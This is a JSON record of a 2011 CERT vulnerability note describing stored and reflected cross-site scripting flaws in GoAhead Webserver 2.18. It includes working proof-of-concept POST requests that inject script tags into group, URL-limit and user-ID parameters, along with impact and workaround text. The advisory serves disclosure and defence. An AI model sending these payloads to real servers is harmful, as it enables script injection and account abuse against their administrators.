{"vuid":"VU#384427","idnumber":"384427","name":"GoAhead Webserver multiple stored XSS vulnerabilities","keywords":["goahead","webserver","xss","post","csrf"],"overview":"GoAhead Webserver 2.18 and possibly previous or newer versions, are vulnerable to multiple stored and reflective cross site scripting (XSS) vulnerabilities.","clean_desc":"GoAhead Webserver software fails to sanitize POST requests sent to the multiple functions. As a result, stored and reflective cross site scripting (XSS) attacks can be conducted. An attacker can inject javascript code that will be run each time the specified webpage is accessed by inserting javascript code in the affected parameter. According to the reporter the following webpages and parameters are affected by stored and reflective XSS vulnerabilities: Stored XSS in group parameter of addgroup.asp. POST /goform/AddGroup HTTP/1.1\ngroup=<script>alert(1337)</script>&privilege=4&method=1&enabled=on&ok=OK Results:   Reflected XSS displayed in addgroup.asp, stored XSS in: adduser.asp, addlimit.asp, delgroup.asp. Stored XSS in url parameter of addlimit.asp POST /goform/AddAccessLimit HTTP/1.1\nurl=<script>alert(1337)</script>&group=test&method=3&ok=OK Results: Stored when user requests dellimit.asp. Stored XSS in adduser.asp, User ID parameter. Note: for this to work, there must be at least one valid group created in \naddgroup.asp. In this example, you can swap out the group=<script>alert(1337) \nfor whichever group name you added.  password= and passconf= can also be \nmodified to whichever password you want the new user to have. POST /goform/AddUser HTTP/1.1\nuser=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%2\n9%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK Result: Reflected in reply, stored in: deluser.asp,dspuser.asp.","impact":"An attacker with access to the GoAhead Webserver can conduct a cross site scripting attack, which could be used to result in information leakage, privilege escalation, and/or denial of service.","resolution":"We are currently unaware of a practical solution to this problem.","workarounds":"Restrict access As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing a GoAhead Webserver using stolen credentials from a blocked network location.","sysaffected":"The reporter was unable to confirm if any previous or newer","thanks":"Thanks to Silent Dream for reporting this vulnerability.","author":"This document was written by Michael Orlando.","public":[],"cveids":[""],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2011-09-15T18:57:17Z","publicdate":"2011-10-10T00:00:00Z","datefirstpublished":"2011-10-10T12:06:23Z","dateupdated":"2011-10-10T12:58:47Z","revision":21,"vrda_d1_directreport":"1","vrda_d1_population":"3","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"2","cam_population":"4","cam_impact":"9","cam_easeofexploitation":"18","cam_attackeraccessrequired":"20","cam_scorecurrent":"0.486","cam_scorecurrentwidelyknown":"5.346","cam_scorecurrentwidelyknownexploited":"10.206","ipprotocol":"","cvss_accessvector":"","cvss_accesscomplexity":"","cvss_authentication":null,"cvss_confidentialityimpact":"","cvss_integrityimpact":"","cvss_availabilityimpact":"","cvss_exploitablity":null,"cvss_remediationlevel":"","cvss_reportconfidence":"","cvss_collateraldamagepotential":"","cvss_targetdistribution":"","cvss_securityrequirementscr":"","cvss_securityrequirementsir":"","cvss_securityrequirementsar":"","cvss_basescore":"","cvss_basevector":"","cvss_temporalscore":"","cvss_environmentalscore":"","cvss_environmentalvector":"","metric":0.486,"vulnote":null}